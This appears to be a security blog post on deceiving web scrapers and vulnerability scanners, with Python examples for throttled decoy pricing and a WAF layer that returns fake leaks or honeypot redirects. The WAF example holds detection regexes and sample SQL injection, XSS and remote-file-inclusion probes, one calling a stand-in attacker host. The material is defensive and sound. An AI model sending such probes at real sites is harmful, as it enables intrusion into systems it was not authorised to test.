A common defensive rule of information security is that once you detect an attack against your organization’s Web applications, you must mitigate the attack by stopping it. In other words: “stop it once you can”.
But what if the rules of the defenders vs. attackers “game” have changed and the teams are not playing in the same league anymore?
For example, here are some of the “game” changers from recent years:
- The playground (aka an attacker’s computing resources) became ridiculously cheap to hire (if not available for free)
- The players of team “black” (also known as attackers) became more persistent, targeted and ruthless
- The players of team “white” (also known as defenders) became overwhelmed by an endless stream of security incidents and are constantly one step behind the attackers
In recent years we have seen an increased number of defenders changing the rules of the “game” and adopting new defensive techniques. Those techniques give the attacker the deceptive feeling that the attack was not detected, while reducing its effectiveness to the point where completing it costs more time and resources than it is worth.
Maybe the common defensive approach is not good enough; maybe it is time for more defenders to step up their game and introduce “game” changing rules?
Game Changing Rules
Web applications are constantly being attacked, whether these attacks are by script kiddies, cyber-criminals, or government and military organizations.
Once an attack is detected, the most common defensive approach is to block malicious traffic, or to identify the source of the attack and block all traffic initiated from it.
In order to become persistent and agile and to keep the upper hand, the attacker may use internet infrastructure and services such as cloud-hosting providers, mobile networks, open proxies, VPNs or even compromised computers (a botnet). These infrastructures and services give the attacker the ability to switch easily between networks and computing resources without any downtime in attack activity. In addition, by using the “stop it once you can” defensive approach, the defender gives the attacker a better understanding of the defender’s security posture and resilience.
A good example that illustrates the disadvantage of the “stop it once you can” approach can be seen in Web scraping attacks. For example, if an attacker were to run a Web scraping attack against a product price catalog, the on-going scraping activity may result in the attacker obtaining the most up-to-date price list, leading to a constant competitive advantage. Clearly, a retailer that owns a competitor’s price catalog will have better sales.
A defender who blocks traffic initiated from the scraping host may simply lead the persistent (and money-driven) attacker to switch the scraping activity to a new computing resource, for example by easily launching new virtual machines at a cloud hosting provider.
In the Web scraping attack scenario, a game changer approach would be to give the attacker a false sense of success by:
a. Limiting scraping activity – throttling the scraping rate to the point where, by the time all the data has been harvested, it is out of date and irrelevant.
b. Generating bogus scraping data – feeding the attacker bogus and misleading data that won’t provide the desired competitive advantage.
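The two techniques above, throttling and bogus data, are easy to combine in one decision point in front of the catalog. The following is an added example written for this post, not code from the original article: a per-client sliding-window counter flags a scraper, and from then on the client keeps receiving HTTP 200 answers, only slower (a growing artificial delay) and with prices that are wrong. The wrong prices are derived from a keyed hash of (client, SKU), so the same client always sees the same wrong price for a given item and cannot detect the decoy simply by re-requesting. The catalog contents, the secret, the client identifiers and the thresholds are all constructed for the example and would need tuning for a real application.

```python
import hashlib
import hmac
import time
from collections import defaultdict, deque

# Constructed sample catalog for the example (not data from the article).
CATALOG = {"sku-100": 19.99, "sku-101": 49.50, "sku-102": 5.25}


class ScraperDeception:
    """Per-client sliding-window rate tracking with throttled decoy pricing.

    A client that exceeds `limit` catalog requests within `window` seconds is
    treated as a scraper. Instead of a 429 or a block it keeps getting answers,
    but each one is delayed and carries a bogus price.
    """

    def __init__(self, secret, window=60, limit=30, max_delay=30.0):
        self.secret = secret          # bytes; assumed server-side secret, never sent to clients
        self.window = window          # sliding window length in seconds
        self.limit = limit            # requests per window before decoying starts
        self.max_delay = max_delay    # cap on the artificial response delay (seconds)
        self.history = defaultdict(deque)   # client id -> timestamps of recent requests

    def _count_recent(self, client, now):
        """Record one request and return how many requests fall inside the window."""
        q = self.history[client]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q)

    def decoy_price(self, sku, client):
        """Bogus price: real price scaled by a factor in [0.85, 1.20].

        The factor comes from HMAC-SHA256(secret, client || sku), so one client
        always sees the same wrong price for a given SKU.
        """
        mac = hmac.new(self.secret, (client + "\0" + sku).encode(), hashlib.sha256).hexdigest()
        fraction = int(mac[:8], 16) / 0xFFFFFFFF   # uniform-ish value in [0, 1]
        return round(CATALOG[sku] * (0.85 + 0.35 * fraction), 2)

    def handle(self, client, sku, now=None):
        """Answer one price lookup; returns a dict describing the response to send."""
        if sku not in CATALOG:
            return {"status": 404, "price": None, "decoy": False, "delay": 0.0}
        now = time.time() if now is None else now
        count = self._count_recent(client, now)
        if count <= self.limit:
            return {"status": 200, "price": CATALOG[sku], "decoy": False, "delay": 0.0}
        # Scraper: same HTTP status as a normal answer, but slower and wrong.
        delay = min(self.max_delay, 0.5 * (count - self.limit))
        return {"status": 200, "price": self.decoy_price(sku, client),
                "decoy": True, "delay": delay}


if __name__ == "__main__":
    # Constructed walk-through: one client fetching the same SKU eight times.
    d = ScraperDeception(secret=b"replace-with-a-real-secret", window=60, limit=5)
    for i in range(8):
        print(i + 1, d.handle("203.0.113.7", "sku-100", now=1000 + i))
```

The serving layer is expected to sleep (or await) for `delay` seconds before writing the response; the decision logic itself never blocks. Keying the decoy on a server-side secret matters: if the bogus prices were random, a scraper comparing two fetches of the same item would notice the inconsistency and know it had been detected.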
Another good example can be found when security scanners scan a Web application for vulnerabilities. Once activated, a security scanner will crawl and map all Web application pages and functionality and try to find out whether the application is vulnerable to attack vectors such as SQL Injection, Cross Site Scripting or Remote File Inclusion. Common defensive approaches use signature-based solutions, such as a Web Application Firewall (WAF), in order to block malicious transactions. Once the scan completes, the attacker has a good picture of the resilience of the targeted Web application and responds by looking for new attack surface or by using other, more elusive attack techniques.
In the security scan case, a game changer approach would be to still prevent malicious HTTP transactions from hitting the Web server by using a WAF, while at the same time returning bogus responses to the scanner, such as:
a. Injecting fake code leakage to Web application responses
b. Redirecting traffic to a Web application honeypot that is not part of the targeted Web application
In this case, the suggested techniques create overhead for attackers, leading them to spend more time and resources analyzing bogus vulnerabilities.
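What distinguishes this from ordinary WAF blocking is only the response: the request still never reaches the backend, but the scanner receives a success-looking answer instead of a 403. The following added example (written for this post, not the article's or any WAF vendor's code) sketches that decision layer for the three vector families named above. The signatures are deliberately tiny illustrations, the honeypot address `https://honeypot.example/app/` is an assumed placeholder, and the "leaked" debug dump is a constructed decoy whose host names, paths and credential are all bogus.

```python
import re
from urllib.parse import unquote_plus

# Assumed honeypot location, not from the article. It must be a separate
# deployment that shares nothing (code, data, credentials) with the real app.
HONEYPOT_URL = "https://honeypot.example/app/"

# Illustrative detection signatures for the three vector families the text
# names. Real WAF rule sets are far larger; these only exist to drive the example.
SIGNATURES = [
    ("sqli", re.compile(r"(?i)(\bunion\b\s+\bselect\b|'\s*(or|and)\s+\S+\s*=\s*\S+)")),
    ("xss", re.compile(r"(?i)(<script\b|javascript:|\bon\w+\s*=)")),
    ("rfi", re.compile(r"(?i)=\s*(https?|ftp)://")),
]

# Constructed decoy body: looks like a careless debug dump, but every value
# in it is bogus and points nowhere that exists.
DECOY_LEAK = """<html><body><pre>
Warning: mysqli_connect(): (HY000/1045): Access denied for user 'app'@'db-internal.example'
in /var/www/app/includes/db.inc.php on line 14
  $db_host = 'db-internal.example';
  $db_user = 'app';
  $db_pass = 'DECOY-PLACEHOLDER';
</pre></body></html>
"""


def classify(path, query="", body=""):
    """Return the name of the first matching signature, or None for a clean request."""
    sample = unquote_plus(path + "?" + query + " " + body)   # decode %xx and '+' first
    for name, pattern in SIGNATURES:
        if pattern.search(sample):
            return name
    return None


def build_response(path, query="", body=""):
    """Decide what the WAF layer does with one request.

    Clean requests are forwarded to the backend. Matching requests never reach
    it; instead of a 403 the scanner gets a plausible-looking success response.
    """
    kind = classify(path, query, body)
    if kind is None:
        return {"action": "forward", "kind": None, "status": None, "headers": {}, "body": ""}
    if kind == "rfi":
        # File-inclusion probes are bounced into the honeypot application,
        # where every follow-up request can be observed in isolation.
        return {"action": "decoy-redirect", "kind": kind, "status": 302,
                "headers": {"Location": HONEYPOT_URL + path.lstrip("/")}, "body": ""}
    # Injection probes get a fake code/credential leak with a 200, the status
    # a scanner treats as "worth a closer look".
    return {"action": "decoy-leak", "kind": kind, "status": 200,
            "headers": {"Content-Type": "text/html"}, "body": DECOY_LEAK}


if __name__ == "__main__":
    # Constructed sample requests of the shape a scanner sends.
    for path, query in [("/item", "id=42"),
                        ("/item", "id=1%27%20OR%201%3D1"),
                        ("/search", "q=%3Cscript%3Ealert(1)%3C/script%3E"),
                        ("/include", "page=http://attacker-host.example/x.txt")]:
        r = build_response(path, query)
        print(path, query, "->", r["action"], r["status"])
```

Two details carry the deception. The decoy responses use the same status codes and headers as genuine pages, so nothing in the response marks it as synthetic; and every decoy event is a high-confidence detection worth logging, since a legitimate user never trips these signatures and then follows the bogus credentials or the honeypot link.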
Summary
In the “game” of defenders vs. attackers, two ingredients matter most: time and resources. Game changing defensive techniques force attackers to spend more time and resources before their attacks become truly successful. It is time for us, the defenders, to change the rules and gain the upper hand.